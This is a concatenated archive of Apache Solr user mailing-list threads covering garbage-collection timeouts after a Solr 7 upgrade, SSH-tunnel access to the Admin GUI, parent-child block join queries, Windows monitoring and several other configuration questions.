events. There was a spike in CPU up to 66% which is not something we
previously saw w/ Solr 6. From the SOLR logs it looks like something inside
the JVM has happend, SOLR is reporting closed connections from Jetty. Our
data size is relatively small but we do run 5 cores within the one Jetty
instance. There index sizes are anywhere between 200Mb to 2GB

Our memory consumption is relatively low:

"free":"296.1 MB",

  "total":"569.6 MB",

  "max":"9.6 GB",

  "used":"273.5 MB (%2.8)",



We had a spike in traffic about 5 minutes prior to some longer GC events
(similar situation last week).

Any help would be appreciated. Below is my current system info along with a
GC log snippet and the corresponding SOLR log error.

*System info:*
AMZ2 linux
8 core 32 GB Mem
*Java:* 1.8.0_222-ea 25.222-b03
*Solr: *solr-spec-version":"7.7.2"
*Start options: *
"-Xms512m",
"-Xmx10g",
"-XX:NewRatio=3",
"-XX:SurvivorRatio=4",
"-XX:TargetSurvivorRatio=90",
"-XX:MaxTenuringThreshold=8",
"-XX:+UseConcMarkSweepGC",
"-XX:ConcGCThreads=4",
"-XX:ParallelGCThreads=4",
"-XX:+CMSScavengeBeforeRemark",
"-XX:PretenureSizeThreshold=64m",
"-XX:+UseCMSInitiatingOccupancyOnly",
"-XX:CMSInitiatingOccupancyFraction=50",
"-XX:CMSMaxAbortablePrecleanTime=6000",
"-XX:+CMSParallelRemarkEnabled",
"-XX:+ParallelRefProcEnabled",
"-XX:-OmitStackTraceInFastThrow",
"-verbose:gc",
"-XX:+PrintHeapAtGC",
"-XX:+PrintGCDetails",
"-XX:+PrintGCDateStamps",
"-XX:+PrintGCTimeStamps",
"-XX:+PrintTenuringDistribution",
"-XX:+PrintGCApplicationStoppedTime",
"-XX:+UseGCLogFileRotation",
"-XX:NumberOfGCLogFiles=9",
"-XX:GCLogFileSize=20M",
"-Xss256k",
"-Dsolr.log.muteconsole"

Here is an example of from the GC log:

2019-10-02T16:03:15.888+: 265318.624: [Full GC (Allocation
Failure) 2019-10-02T16:03:15.888+: 265318.624:
[CMS2019-10-02T16:03:16.134+: 26
5318.870: [CMS-concurrent-mark: 1.773/1.783 secs] [Times: user=13.14
sys=0.00, real=1.78 secs]
 (concurrent mode failure): 7864319K->7864319K(7864320K), 9.5890129
secs] 10048895K->8863021K(10048896K), [Metaspace:
53159K->53159K(1097728K)], 9.5892061 secs] [Times: user=10.31
sys=0.00, real=9.59 secs]
Heap after GC invocations=296656 (full 546):
 par new generation   total 2184576K, used 998701K
[0x00054000, 0x0005e000, 0x0005e000)
  eden space 1747712K,  57% used [0x00054000,
0x00057cf4b4f0, 0x0005aaac)
  from space 436864K,   0% used [0x0005aaac,
0x0005aaac, 0x0005c556)
  to   space 436864K,   0% used [0x0005c556,
0x0005c556, 0x0005e000)
 concurrent mark-sweep generation total 7864320K, used 7864319K
[0x0005e000, 0x0007c000, 0x0007c000)
 Metaspace   used 53159K, capacity 54766K, committed 55148K,
reserved 1097728K
  class spaceused 5589K, capacity 5950K, committed 6000K, reserved 1048576K
}
2019-10-02T16:03:25.477+: 265328.214: Total time for which
application threads were stopped: 9.5906157 seconds, Stopping threads
took: 0.0001274 seconds
*With the following from the SOLR log: *

[   x:core] o.a.s.s.HttpSolrCall Unable to write response, client
closed connection or we are s

hutting down

org.eclipse.jetty.io.EofException: Closed

at org.eclipse.jetty.server.HttpOutput.write(HttpOutput.java:665)
~[jetty-server-9.4.14.v20181114.jar:9.4.14.v20181114]

at 
org.apache.solr.servlet.ServletOutputStreamWrapper.write(ServletOutputStreamWrapper.java:126)
~[solr-core-7.7.2.jar:7.7.2 d4c30fc2856154f2c

1fefc589eb7cd070a415b94 - janhoy - 2019-05-28 23:37:48]

at 
org.apache.solr.response.QueryResponseWriterUtil$1.write(QueryResponseWriterUtil.java:54)
~[solr-core-7.7.2.jar:7.7.2 d4c30fc2856154f2c1fef

c589eb7cd070a415b94 - janhoy - 2019-05-28 23:37:48]

at java.io.OutputStream.write(OutputStream.java:116) ~[?:1.8.0_222-ea]

at sun.nio.cs.StreamEncoder.writeBytes(StreamEncoder.java:221)
~[?:1.8.0_222-ea]

at sun.nio.cs.StreamEncoder.implWrite(StreamEncoder.java:282)
~[?:1.8.0_222-ea]

at sun.nio.cs.StreamEncoder.write(StreamEncoder.java:125)
~[?:1.8.0_222-ea]

at java.io.OutputStreamWriter.write(OutputStreamWriter.jav

Fwd: Solr standalone timeouts after upgrading to SOLR 7

2019-10-02 Thread Solr User
Hello all,

We recently moved to SOLR 7 from SOLR 6 about 2 weeks ago. Once each week
(including today) we experienced query timeout issues with corresponding GC
events. There was a spike in CPU up to 66% which is not something we
previously saw w/ Solr 6. From the SOLR logs it looks like something inside
the JVM has happend, SOLR is reporting closed connections from Jetty. Our
data size is relatively small but we do run 5 cores within the one Jetty
instance. There index sizes are anywhere between 200Mb to 2GB

Our memory consumption is relatively low:

"free":"296.1 MB",

  "total":"569.6 MB",

  "max":"9.6 GB",

  "used":"273.5 MB (%2.8)",



We had a spike in traffic about 5 minutes prior to some longer GC events
(similar situation last week).

Any help would be appreciated. Below is my current system info along with a
GC log snippet and the corresponding SOLR log error.

*System info:*
AMZ2 linux
8 core 32 GB Mem
*Java:* 1.8.0_222-ea 25.222-b03
*Solr: *solr-spec-version":"7.7.2"
*Start options: *
"-Xms512m",
"-Xmx10g",
"-XX:NewRatio=3",
"-XX:SurvivorRatio=4",
"-XX:TargetSurvivorRatio=90",
"-XX:MaxTenuringThreshold=8",
"-XX:+UseConcMarkSweepGC",
"-XX:ConcGCThreads=4",
"-XX:ParallelGCThreads=4",
"-XX:+CMSScavengeBeforeRemark",
"-XX:PretenureSizeThreshold=64m",
"-XX:+UseCMSInitiatingOccupancyOnly",
"-XX:CMSInitiatingOccupancyFraction=50",
"-XX:CMSMaxAbortablePrecleanTime=6000",
"-XX:+CMSParallelRemarkEnabled",
"-XX:+ParallelRefProcEnabled",
"-XX:-OmitStackTraceInFastThrow",
"-verbose:gc",
"-XX:+PrintHeapAtGC",
"-XX:+PrintGCDetails",
"-XX:+PrintGCDateStamps",
"-XX:+PrintGCTimeStamps",
"-XX:+PrintTenuringDistribution",
"-XX:+PrintGCApplicationStoppedTime",
"-XX:+UseGCLogFileRotation",
"-XX:NumberOfGCLogFiles=9",
"-XX:GCLogFileSize=20M",
"-Xss256k",
"-Dsolr.log.muteconsole"

Here is an example of from the GC log:

2019-10-02T16:03:15.888+: 265318.624: [Full GC (Allocation
Failure) 2019-10-02T16:03:15.888+: 265318.624:
[CMS2019-10-02T16:03:16.134+: 26
5318.870: [CMS-concurrent-mark: 1.773/1.783 secs] [Times: user=13.14
sys=0.00, real=1.78 secs]
 (concurrent mode failure): 7864319K->7864319K(7864320K), 9.5890129
secs] 10048895K->8863021K(10048896K), [Metaspace:
53159K->53159K(1097728K)], 9.5892061 secs] [Times: user=10.31
sys=0.00, real=9.59 secs]
Heap after GC invocations=296656 (full 546):
 par new generation   total 2184576K, used 998701K
[0x00054000, 0x0005e000, 0x0005e000)
  eden space 1747712K,  57% used [0x00054000,
0x00057cf4b4f0, 0x0005aaac)
  from space 436864K,   0% used [0x0005aaac,
0x0005aaac, 0x0005c556)
  to   space 436864K,   0% used [0x0005c556,
0x0005c556, 0x0005e000)
 concurrent mark-sweep generation total 7864320K, used 7864319K
[0x0005e000, 0x0007c000, 0x0007c000)
 Metaspace   used 53159K, capacity 54766K, committed 55148K,
reserved 1097728K
  class spaceused 5589K, capacity 5950K, committed 6000K, reserved 1048576K
}
2019-10-02T16:03:25.477+: 265328.214: Total time for which
application threads were stopped: 9.5906157 seconds, Stopping threads
took: 0.0001274 seconds
*With the following from the SOLR log: *

[   x:core] o.a.s.s.HttpSolrCall Unable to write response, client
closed connection or we are s

hutting down

org.eclipse.jetty.io.EofException: Closed

at org.eclipse.jetty.server.HttpOutput.write(HttpOutput.java:665)
~[jetty-server-9.4.14.v20181114.jar:9.4.14.v20181114]

at 
org.apache.solr.servlet.ServletOutputStreamWrapper.write(ServletOutputStreamWrapper.java:126)
~[solr-core-7.7.2.jar:7.7.2 d4c30fc2856154f2c

1fefc589eb7cd070a415b94 - janhoy - 2019-05-28 23:37:48]

at 
org.apache.solr.response.QueryResponseWriterUtil$1.write(QueryResponseWriterUtil.java:54)
~[solr-core-7.7.2.jar:7.7.2 d4c30fc2856154f2c1fef

c589eb7cd070a415b94 - janhoy - 2019-05-28 23:37:48]

at java.io.OutputStream.write(OutputStream.java:116) ~[?:1.8.0_222-ea]

at sun.nio.cs.StreamEncoder.writeBytes(StreamEncoder.java:221)
~[?:1.8.0_222-ea]

at sun.nio.cs.StreamEncoder.implWrite(StreamEncoder.java:282)
~[?:1.8.0_222-ea]

at sun.nio.cs.StreamEncoder.write(StreamEncoder.java:125)
~[?:1.8.0_222-ea]

at java.io.OutputStreamWriter.write(OutputStreamWriter.jav

How to access the Solr Admin GUI (2)

2019-01-02 Thread solr

First I want to thank you for your comments.
Second I'll add some background information.

Here Solr is part of a complex information management project, which I  
developed for a customer and which includes different source  
databases, containing edited/imported/crawled content.
This project runs on a Debian root server, which is hosted by an ISP  
and maintained by the ISP's support team and - a little bit - by me.

This setting was required by my customer.

Solr searches are created and processed on this server from a PHP  
MySQL stack, and port 8983 is only available internally.
I agree the opening port 8983 to the public is dangerous, I've  
experienced that.
Nevertheless from time to time I need access to the Solr Admin GUI on  
that server.


My ISP's support team is not familiar with Solr, but willing to help.
So I'll forward your comments to them and discuss with them.

Thank you again.
Walter


Shawn Heisey  schrieb am 01.01.2019 20:00:13:

If you've blocked the Solr port, then you can't access Solr at all,  
including the admin UI.  The UI is accessed through the same port as  
the rest of Solr.


The admin UI is a static set of resources (html, css, javascript,  
images, etc) that gets downloaded and runs within the browser,  
accessing the same API that anything else would.  When you issue a  
query with the admin UI, it is your browser that makes the query,  
not the server.


If you set up a reverse proxy that blocks URL paths for the API  
while allowing URL paths for the admin UI, then the admin UI won't  
work -- because everything the admin UI displays or does is  
accomplished by your browser making calls to the API.


Thanks,
Shawn



Terry Steichen  schrieb am 01.01.2019 19:39:04:


I think a better approach to tunneling would be:

ssh -p  -L :localhost:8983 use...@myremoteserver.example.com

This requires you to set up a different port () rather than use the
standard 22 port (on your router and on your sshd config).  I've been
running something like this for about a year and have rarely if ever had
it attacked.  Prior to changing the port (to ), however, I was under
constant hacking attacks - they find port 22 too attractive to ignore.

Also, regarding my use of port : if you have the server running on
several local machines (as I do), the use of the  port may help
prevent confusion (as to whether your browser is accessing a local -
defaulted to 8983 - or a remote solr server).

Note: you might find that the ssh connection will drop out after some
inactivity, and need to be restarted occasionally.  Pretty simple to do
- just run the ssh line above again.

Note: I also add authorization controls to the AdminUI (and its functions)



Jörn Franke  schrieb am 01.01.2019 19:11:18:

You could configure a reverse proxy to provide one or more means of  
authentication.


However, I agree that the purpose why this is done should be clarified.



Kay Wrobel  schrieb am 01.01.2019 19:02:10:


You can use ssh to tunnel in.

ssh -L8983:localhost:8983 use...@myremoteserver.example.com

This will only require port 22 to be exposed to the public.


Sent from my iPhone



Walter Underwood  schrieb am 01.01.2019 19:00:31:


Yes, exposing the admin UI on the web is very dangerous. Anyone who finds it
can delete all your collections. That UI is designed for “back  
office” use only.


wunder
Walter Underwood
wun...@wunderwood.org
http://observer.wunderwood.org/  (my blog)



Gus Heck  schrieb am 01.01.2019 18:43:02:


Why would you want to expose the administration gui on the web? This is a
very hazardous thing to do. Never mind that it normally also runs on 8983
and all it's functionality relies on the ability to interact with 8983
hosted api end points.

What are you actually trying to solve?



Jörn Franke  schrieb am 31.12.2018 23:07:49:


Reverse proxy?



"aleksander_goncha...@yahoo.de"   
schrieb am 31.12.2018 23:22:59:



Hi Walter,

hatte ähnlichen Fall. Der wurde mit Proxy gelöst. "Einfach" Ngnix  
dazwischen geschaltet.


Viele Grüße
Alexander


s...@cid.is schrieb am 31.12.2018 22:48:55:


Hi all,

is there a way, better a solution, to access the Solr Admin GUI from  
 outside the server (via public web) while the Solr port 8983 is  
closed  by a firewall and only available inside the server via  
localhost?


Thanks in advance
Walter Claassen

Alexandraweg 32
D 64287 Darmstadt
Fon +49-6151-4937961
Fax +49-6151-4937969
c...@cid.is




How to access the Solr Admin GUI

2018-12-31 Thread solr

Hi all,

is there a way, better a solution, to access the Solr Admin GUI from  
outside the server (via public web) while the Solr port 8983 is closed  
by a firewall and only available inside the server via localhost?


Thanks in advance
Walter Claassen

Alexandraweg 32
D 64287 Darmstadt
Fon +49-6151-4937961
Fax +49-6151-4937969
c...@cid.is



Re: How to retrieve nested documents (parents and their children together) ?

2018-07-25 Thread TK Solr

Ah, that's what _root_ is for ! I was wondering.

Thank you!


On 7/25/18 2:36 PM, Mikhail Khludnev wrote:

_root_:parent-id

чт, 26 июля 2018, 1:33 TK Solr :


The child doc transformer worked great. Thank you.

In my experiment, posting 'parent-id' to the
update
end point only deleted the parent doc. Do I insert a complex join query
from id
to _version_ and delete all the docs of the matching _version_ ?


On 7/24/18 9:27 PM, TK Solr wrote:

Thank you. I'll try the child doc transformer.

On a related question, if I delete a parent document, will its children

be

deleted also? Or do I have to have a parent_id field in each child so

that the

child docs can be deleted?


On 7/22/18 10:05 AM, Mikhail Khludnev wrote:

Hello,
Check [child]


https://lucene.apache.org/solr/guide/7_4/transforming-result-documents.html#child-childdoctransformerfactory

or [subquery].
Although, it's worth to put reference to it somewhere in blockjoin
qparsers.
Documentation patches are welcome.


On Sun, Jul 22, 2018 at 10:25 AM TK Solr  wrote:


https://lucene.apache.org/solr/guide/7_4/other-parsers.html#block-join-parent-query-parser


talks about {!parent which=}


child
docs>, which returns parent docs only, and
{!child of=} 
docs>,

which
returns child docs only.

Is there a way to retrieve the matched documents in the original,

nested

form?
Using the sample document, is there way to get:


 1
     Solr has block join support
 parentDocument
 
 2
 SolrCloud supports it too!
 


rather than just the parent or the child docs?









Re: How to retrieve nested documents (parents and their children together) ?

2018-07-25 Thread TK Solr

The child doc transformer worked great. Thank you.

In my experiment, posting 'parent-id' to the update 
end point only deleted the parent doc. Do I insert a complex join query from id 
to _version_ and delete all the docs of the matching _version_ ?



On 7/24/18 9:27 PM, TK Solr wrote:

Thank you. I'll try the child doc transformer.

On a related question, if I delete a parent document, will its children be 
deleted also? Or do I have to have a parent_id field in each child so that the 
child docs can be deleted?



On 7/22/18 10:05 AM, Mikhail Khludnev wrote:

Hello,
Check [child]
https://lucene.apache.org/solr/guide/7_4/transforming-result-documents.html#child-childdoctransformerfactory 


or [subquery].
Although, it's worth to put reference to it somewhere in blockjoin
qparsers.
Documentation patches are welcome.


On Sun, Jul 22, 2018 at 10:25 AM TK Solr  wrote:

https://lucene.apache.org/solr/guide/7_4/other-parsers.html#block-join-parent-query-parser 



talks about {!parent which=} , which returns parent docs only, and
{!child of=} ,
which
returns child docs only.

Is there a way to retrieve the matched documents in the original, nested
form?
Using the sample document, is there way to get:


1
Solr has block join support
parentDocument

2
SolrCloud supports it too!



rather than just the parent or the child docs?









Re: How to retrieve nested documents (parents and their children together) ?

2018-07-24 Thread TK Solr

Thank you. I'll try the child doc transformer.

On a related question, if I delete a parent document, will its children be 
deleted also? Or do I have to have a parent_id field in each child so that the 
child docs can be deleted?



On 7/22/18 10:05 AM, Mikhail Khludnev wrote:

Hello,
Check [child]
https://lucene.apache.org/solr/guide/7_4/transforming-result-documents.html#child-childdoctransformerfactory
or [subquery].
Although, it's worth to put reference to it somewhere in blockjoin
qparsers.
Documentation patches are welcome.


On Sun, Jul 22, 2018 at 10:25 AM TK Solr  wrote:


https://lucene.apache.org/solr/guide/7_4/other-parsers.html#block-join-parent-query-parser

talks about {!parent which=} , which returns parent docs only, and
{!child of=} ,
which
returns child docs only.

Is there a way to retrieve the matched documents in the original, nested
form?
Using the sample document, is there way to get:


1
Solr has block join support
parentDocument

2
SolrCloud supports it too!



rather than just the parent or the child docs?







How to retrieve nested documents (parents and their children together) ?

2018-07-22 Thread TK Solr

https://lucene.apache.org/solr/guide/7_4/other-parsers.html#block-join-parent-query-parser

talks about {!parent which=} docs>, which returns parent docs only, and
{!child of=} , which 
returns child docs only.


Is there a way to retrieve the matched documents in the original, nested form? 
Using the sample document, is there way to get:



  1
  Solr has block join support
  parentDocument
  
  2
  SolrCloud supports it too!
  


rather than just the parent or the child docs?




Re: Parent-child query; subqueries on child docs of the same set of fields

2018-07-08 Thread TK Solr

Mikhail,

Actually, your suggestion worked! I was making a typo on the field name. Thank 
you very much!


TK

p.s. I have found a mention of _query_ "magic field" in the Solr Reference Guide


On 7/8/18 11:04 AM, TK Solr wrote:

Thank you.

This is more promising because I see the second clause in parsedquery. But it 
is hitting zero document.


The debug query output looks like this. explain is empty:


rawquerystring":"_query_:{!parent which=\"isParent:true\" v='attrname:genre 
AND attrvalue:drama'} AND _query_:{!parent which=\"isParent:true\" 
v='attrname:country AND attrvalue:USA'}",
"querystring":"_query_:{!parent which=\"isParent:true\" v='attrname:genre 
AND attrvalue:drama'} AND _query_:{!parent which=\"isParent:true\" 
v='attrname:country AND attrvalue:USA'}",
"parsedquery":"+AllParentsAware(ToParentBlockJoinQuery (+(+attrname:genre 
+attrvalue:drama))) +AllParentsAware(ToParentBlockJoinQuery 
(+(+attrname:country +attrvalue:usa)))",
"parsedquery_toString":"+ToParentBlockJoinQuery (+(+attrname:genre 
+attrvalue:drama)) +ToParentBlockJoinQuery (+(+attrname:country 
+attrvalue:usa))",

"explain":{},
"QParser":"LuceneQParser",
"timing":{...}


Could you tell me what _query_ does?


On 7/4/18 10:25 PM, Mikhail Khludnev wrote:

agh... It's my pet peeve.
what about
q= {!parent which="isParent:true" v='attrname:genre AND attrvalue:drama'}
AND {!parent which="isParent:true" v='attrname:country AND attrvalue:USA'}

^leading space
q=_query_:{!parent which="isParent:true" v='attrname:genre AND
attrvalue:drama'} AND _query_:{!parent which="isParent:true"
v='attrname:country
AND attrvalue:USA'}
q=+{!parent which="isParent:true" v='attrname:genre AND
attrvalue:drama'} +{!parent
which="isParent:true" v='attrname:country AND attrvalue:USA'}
Beware of escape encoding. it might require to replace + to %2b.
Post debug=query response here.

On Tue, Jul 3, 2018 at 9:25 PM TK Solr  wrote:


Thank you, Mikhail. But this didn't work. The first {!parent which='...'
v='...'} alone works. But the second {!parent ...} clause is completely
ignored.
In fact, if I turn on debugQuery, rawquerystring and querystring have the
second
query but parsedquery and parsedquery_toString only have the first query.
BTW,
does is the v parameter works in place of the query following {!parsername
} for
any parser?


On 7/3/18 12:42 PM, Mikhail Khludnev wrote:

q={!parent which="isParent:true" v='attrname:genre AND attrvalue:drama'}

AND

{!parent which="isParent:true" v='attrname:country AND attrvalue:USA'}








Re: Parent-child query; subqueries on child docs of the same set of fields

2018-07-08 Thread TK Solr

Thank you.

This is more promising because I see the second clause in parsedquery. But it is 
hitting zero document.


The debug query output looks like this. explain is empty:


rawquerystring":"_query_:{!parent which=\"isParent:true\" v='attrname:genre AND 
attrvalue:drama'} AND _query_:{!parent which=\"isParent:true\" 
v='attrname:country AND attrvalue:USA'}",
"querystring":"_query_:{!parent which=\"isParent:true\" v='attrname:genre 
AND attrvalue:drama'} AND _query_:{!parent which=\"isParent:true\" 
v='attrname:country AND attrvalue:USA'}",
"parsedquery":"+AllParentsAware(ToParentBlockJoinQuery (+(+attrname:genre 
+attrvalue:drama))) +AllParentsAware(ToParentBlockJoinQuery (+(+attrname:country 
+attrvalue:usa)))",
"parsedquery_toString":"+ToParentBlockJoinQuery (+(+attrname:genre 
+attrvalue:drama)) +ToParentBlockJoinQuery (+(+attrname:country +attrvalue:usa))",

"explain":{},
"QParser":"LuceneQParser",
"timing":{...}


Could you tell me what _query_ does?


On 7/4/18 10:25 PM, Mikhail Khludnev wrote:

agh... It's my pet peeve.
what about
q= {!parent which="isParent:true" v='attrname:genre AND attrvalue:drama'}
AND {!parent which="isParent:true" v='attrname:country AND attrvalue:USA'}

^leading space
q=_query_:{!parent which="isParent:true" v='attrname:genre AND
attrvalue:drama'} AND _query_:{!parent which="isParent:true"
v='attrname:country
AND attrvalue:USA'}
q=+{!parent which="isParent:true" v='attrname:genre AND
attrvalue:drama'} +{!parent
which="isParent:true" v='attrname:country AND attrvalue:USA'}
Beware of escape encoding. it might require to replace + to %2b.
Post debug=query response here.

On Tue, Jul 3, 2018 at 9:25 PM TK Solr  wrote:


Thank you, Mikhail. But this didn't work. The first {!parent which='...'
v='...'} alone works. But the second {!parent ...} clause is completely
ignored.
In fact, if I turn on debugQuery, rawquerystring and querystring have the
second
query but parsedquery and parsedquery_toString only have the first query.
BTW,
does is the v parameter works in place of the query following {!parsername
} for
any parser?


On 7/3/18 12:42 PM, Mikhail Khludnev wrote:

q={!parent which="isParent:true" v='attrname:genre AND attrvalue:drama'}

AND

{!parent which="isParent:true" v='attrname:country AND attrvalue:USA'}






Re: Parent-child query; subqueries on child docs of the same set of fields

2018-07-03 Thread TK Solr
Thank you, Mikhail. But this didn't work. The first {!parent which='...' 
v='...'} alone works. But the second {!parent ...} clause is completely ignored.
In fact, if I turn on debugQuery, rawquerystring and querystring have the second 
query but parsedquery and parsedquery_toString only have the first query. BTW, 
does is the v parameter works in place of the query following {!parsername } for 
any parser?



On 7/3/18 12:42 PM, Mikhail Khludnev wrote:

q={!parent which="isParent:true" v='attrname:genre AND attrvalue:drama'} AND

{!parent which="isParent:true" v='attrname:country AND attrvalue:USA'}




Parent-child query; subqueries on child docs of the same set of fields

2018-07-03 Thread TK Solr

I have a document with child documents like:

  
maindoc_121
true
child_121_1
genre
drama


child_121_2
country
USA



The child documents have the same set of fields.

I can write a query that has a child which has attrname=genre and 
attrvalue=drama as

q={!parent which="isParent:true"} attrname:genre AND attrvalue:drama


But if I want to add another condition that the parent must have another child 
that have certain values, what do I do?


q={!parent which="isParent:true"} attrname:genre AND attrvalue:drama AND 
attrname:country AND attrvalue:USA


would mean a query of parent where one of the children must match. I want a 
parent that have two children, one is matched by one sub-query, and another is 
matched by another sub-query.


TK




Re: Windows monitoring software for Solr recommendation

2018-06-05 Thread TK Solr

On 6/5/18 10:31 AM, Christopher Schultz wrote:


How about Apache procrun/commons-daemon?

https://commons.apache.org/proper/commons-daemon/procrun.html

Thank you, I'll take a look.

On 6/5/18 1:51 PM, Shawn Heisey wrote:

The best bet for
an easy service install is probably NSSM.  It's got a name that some
people hate, but a lot of people use it successfully.

https://nssm.cc/

Thank you, I'll take a look at this one too.


You mentioned looking at a GC log.  Can you provide that entire log for
analysis?
Thank you for your offer to help. But I don't really think this is a memory 
related issue.
I visualized the GC log with GCMV (GCVM?) and the graph shows Solr was using 
less than half of the heap space at the peak.

This Solr doesn't get much query traffic and no indexing was running.
It's really a sudden death of JVM with no trace.

The only concern I have is that the Solr config files are that of Solr 5.x and 
they just upgraded to Solr 6.6. But I understand Solr 6 supports Solr 5 
compatible mode. Has there been any issue in the compatibility mode?


TK





Windows monitoring software for Solr recommendation

2018-06-05 Thread TK Solr
My client's Solr 6.6 running on a Windows server is mysteriously crashing 
without any JVM crash log. No unusual activities recorded in solr.log. GC log 
does not indicate the OOM situation. It's a simple single-core, single node 
deployment (no solrCloud). It has very light load. No indexing activities were 
running near the crash time.


After exhausting all possibilities (suggestions are welcome), I'd like to 
recommend to install some monitoring software but I couldn't find one that works 
on Windows for a Java based software. (Some I found can monitor only EXEs. Since 
all java software shares the same EXE, java.EXE, those won't work.) Can anyone 
recommend some? They don't need to be free but can't be very expensive since 
it's a very lightly used Solr system. Perhaps less than $500?


TK




Re: Run solr server using Java program

2018-04-21 Thread TK Solr
The solr.cmd starts Solr by running java -jar start.jar, which has the MANIFEST 
file that tells the java command that it's main class is 
org.eclipse.jetty.start.Main.


So, I would think your Java program should be able to start Solr (jetty, really) 
by calling org.exlipse.jetty.start.Main.main(argv).


But a big question is why you'd like to do that.

TK

On 4/18/18 7:34 AM, rameshkjes wrote:

Hi guys,

I am able to run the solr instance, add the core and import the data
manually. But I want to do everything with the help of Java program, I
searched a lot but did not find any relevant answer.

In order to run the solr server, i execute following command inside
directory: D:\software\solr-7.2.0\solr-7.2.0\bin

 " /solr.cmd -s "C:\Users\lucky\github\myproject\solr-config"/  "

After that I access to " /http://localhost:8983/solr// "

and select the name of core which is "demo"

and then I select/ dataimport/ tab and "/execute/" to import documents.

First thing what i tried is to run the solr server using Java program, which
I am unable to do. Could anyone please with that?

I am using Solr 7.2.0

Thanks



--
Sent from: http://lucene.472066.n3.nabble.com/Solr-User-f472068.html





Minimum memory requirement

2018-01-31 Thread TK Solr
On my AWS t2.micro instance, which only has 1 GB memory, I installed Solr (4.7.1 
- please don't ask) and tried to run it in sample directory as java -jar 
start.jar. It exited shortly due to lack of memory.


How much memory does Solr require to run, with empty core?

TK




literal.* use in posting PDF files

2018-01-30 Thread TK Solr
I have a schema.xml defined to require two fields, "id" and "libDocumentID". 
solrconfig.xml is the standard one.


Using curl, I tried posting a PDF file like this:

curl 
'http://localhost:8983/solr/update/extract?literal.id=foodf=foo=true' 
-F "myfile=@foo.pdf"


but I got:

[doc=foo.pdf] missing required field: 
libDocumentID400


Can I specify more than one litera.name=value ? Do I have to define 
literal.libDocumentID in solrconfig.xml?


I'm using Solr 5.3.1 (please don't ask...).

TK




Bitnami, or other Solr on AWS recommendations?

2018-01-26 Thread TK Solr
If I want to deploy Solr on AWS, do people recommend using the prepackaged 
Bitnami Solr image? Or is it better to install Solr manually on a computer 
instance? Or are there a better way?


TK




Re: Extended characters

2017-10-29 Thread TK Solr

I think you can use ASCIIFoldingFIlter

http://lucene.apache.org/core/6_2_0/analyzers-common/org/apache/lucene/analysis/miscellaneous/ASCIIFoldingFilter.html

by inserting its factory in your schema.

http://lucene.apache.org/core/6_2_0/analyzers-common/org/apache/lucene/analysis/miscellaneous/ASCIIFoldingFilterFactory.html

I would suggest making a separate field for this so that exact match can be 
boosted.

On 10/29/17 10:56 AM, Robert Brown wrote:

Hi,

I have a text field in my index containing extended characters, which I'd like 
to match against when searching without the extended characters.


e.g.  field contains "Ensō" which I want to match when searching for just 
"enso".

My current config for that field (type) is given below:


autoGeneratePhraseQueries="true">






synonyms="index_synonyms.txt" ignoreCase="true" expand="true" />



words="lang/stopwords_en.txt" />




















words="lang/stopwords_en.txt" />





















Kuro


Re: Work-around for "indexed without position data"

2017-07-03 Thread Solr User
Not sure if it helps beyond the steps to reproduce that I supplied above,
but I also see that "Omit Term Frequencies & Positions" is still set on the
field according to the LukeRequestHandler:

ITS--OF--



On Mon, Jun 5, 2017 at 1:18 PM, Solr User <solr...@gmail.com> wrote:

> Sorry for the delay.  I was able to reproduce this easily with my setup,
> but reproducing this on a Solr example proved challenging.  Hopefully the
> work that I did to find the situation in which this is produced will help
> in resolving the problem.  The driving factor for this appears to be how
> updates are sent to Solr.  When sending batches of updates with commits,
> the problem is reproduced.  If the commit is held until after all updates
> are sent, then no problem is produced.  This leads me to believe that this
> issue has something to do with overlapping commits or index merges.  This
> was reproducible regardless of running classic or managed schema and
> regardless of running Solr core or SolrCloud.
>
> There are not many steps to reproduce this, but you will need a way to
> send these updates.  I have included inline create.sh and create.pl
> scripts to generate the data and send the updates.  You can index a
> lastModified field or something to convince yourself that everything has
> been re-indexed.  I left that out to keep the steps lean.  Also, this test
> is using commit statements from the client sending the updates for
> simplicity even though it is not a good practice.  My normal setup is using
> Solrj with commitWithin to allow Solr to manage when the commits take
> place, but the same error is produced either way.
>
>
> *STEPS TO REPRODUCE*
>
>1. Install Solr 5.5.3 and change to that working directory
>2. bin/solr -e techproducts
>3. bin/solr stop [Why these next 3 steps?  These are to start the
>index completely new without the 32 example documents as opposed to a
>delete query.  The documents are not posted after the core is detected the
>second time.]
>4. rm -rf ./example/techproducts/solr/techproducts/data/
>5. bin/solr -e techproducts
>6. ./create.sh
>7. curl -X POST -H 'Content-type:application/json' --data-binary '{
>"replace-field":{ "name":"cat", "type":"text_en_splitting", "indexed":true,
>"multiValued":true, "stored":true } }' http://localhost:8983/solr/
>techproducts/schema
>8. http://localhost:8983/solr/techproducts/select?q=cat:%
>22hard%20drive%22  [error]
>9. ./create.sh
>10. http://localhost:8983/solr/techproducts/select?q=cat:%
>22hard%20drive%22  [error even though all documents have been
>re-indexed]
>
> *create.sh*
> #!/bin/bash
> for i in {1..100}; do
> echo "$i"
> ./create.pl $i > ./create.xml$i
> curl http://localhost:8983/solr/techproducts/update?commit=true -H
> "Content-Type: text/xml" --data-binary @./create.xml$i
> done
>
> *create.pl <http://create.pl>*
> #!/usr/bin/perl
> my $S = $ARGV[0];
> my $I = 100;
> my $N = $S*$I + $I;
> my $i;
> print "\n";
> for($i=$S*$I; $i<$N; $i++) {
>print "SP${i}cat
> hard drive ${i}\n";
> }
> print "\n";
>
>
> On Fri, May 26, 2017 at 2:14 AM, Rick Leir <rl...@leirtech.com> wrote:
>
>> Can you reproduce this error? What are the steps you take to reproduce
>> it? ( simple is better).
>>
>> cheers -- Rick
>>
>>
>>
>> On 2017-05-25 05:46 PM, Solr User wrote:
>>
>>> This is in regards to changing a field type from string to
>>> text_en_splitting, re-indexing all documents, even optimizing to give the
>>> index a chance to merge segments and rewrite itself entirely, and then
>>> getting this error when running a phrase query:
>>> java.lang.IllegalStateException: field "blah" was indexed without
>>> position
>>> data; cannot run PhraseQuery
>>>
>>> I have encountered this issue before and have always done one of the
>>> following as a work-around:
>>> 1.  Instead of changing the field type on an existing field just create a
>>> new field and retire the old one.
>>> 2.  Delete the index directory and start from scratch.
>>>
>>> These work-arounds are not always ideal.  Does anyone know what is
>>> holding
>>> onto that old field type definition?  What thinks it is still a string?
>>> Every document has been re-indexed and I am sure of this because I have a
>>> time stamp indexed.  Is there any other way to get this to work?
>>>
>>> For what it is worth, I am running this in SolrCloud mode but I remember
>>> seeing this issue before SolrCloud was released as well.
>>>
>>>
>>
>


Re: Anonymous Read?

2017-06-06 Thread Solr User
Thanks!  The null role value did the trick.  I tried this with the
